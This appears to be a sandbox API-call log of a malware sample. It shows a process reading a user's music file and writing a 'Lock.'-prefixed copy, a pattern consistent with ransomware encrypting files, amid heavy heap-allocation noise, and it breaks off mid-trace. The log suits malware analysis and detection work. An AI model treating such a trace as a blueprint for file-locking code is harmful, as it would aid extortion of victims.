HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.820] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.820] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0252.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.820] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.820] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.820] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0252.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.821] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0252.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.822] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0252.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.822] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.822] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.822] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.823] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rk60-o366.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0252.824] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.824] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0252.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0252.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x249c7b0 [0252.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.827] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0252.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0252.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0252.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.Rk60-o366.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.rk60-o366.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0252.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0252.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.830] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.830] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0252.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0252.832] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0252.833] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0252.836] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x4980, lpOverlapped=0x0) returned 1 [0252.837] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0252.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14980) returned 0x24c7a50 [0252.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0252.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0252.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14980) returned 0x24dc3d8 [0252.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0252.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.844] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14980) returned 0x24c7a50 [0252.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0252.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.845] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0252.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.846] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0252.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14980) returned 0x24c7a50 [0252.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14980) returned 0x34b2250 [0252.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 